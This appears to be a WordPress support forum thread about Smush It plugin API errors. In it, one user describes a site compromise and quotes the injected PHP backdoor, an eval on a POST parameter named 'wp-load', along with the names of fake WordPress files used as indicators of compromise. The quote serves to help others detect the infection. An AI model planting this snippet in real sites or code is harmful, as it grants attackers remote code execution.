slickrockweb

Hi Umesh,

We are also having the same issue on at least 4 different sites that we have tested so far. When doing a bulk smush they all come back with the below repeating errors. We are using the newest version of Smush It

Error posting to API: GnuTLS recv error (-9): A TLS packet with unexpected length was received.
Error posting to API: GnuTLS recv error (-9): A TLS packet with unexpected length was received.
Error posting to API: GnuTLS recv error (-9): A TLS packet with unexpected length was received.

Robin we had some similar strange behavior on a client’s site last week and it appears the hackers were somehow able to inject PHP code through a contact form. They had hundreds of strange contact form submissions that on first appearance looked like spam but what you didn’t see was the hidden code being injected somehow. This piece of code was added to a bunch of standard WP working files.

if (isset($_POST['wp-load'])) {
	eval($_POST['wp-load']);
};

This code above could be the chicken and the egg problem. Not sure if the code above allows the contact form to be used as an attack vector or the contact form was used first to inject this code. I believe the CAPTCHA was also being completely bypassed.

We also found backdoor shell scripts in folders downstream of /wp-includes/js/. I would look through all of these folders for any PHP files that are unique and not part of your normal wordpress installation.

These files below were that were added that look like they should be WP files but were unique files not part of the normal WP installation.

wp-apps.php
wp-count.php
wp-var.php

Good luck.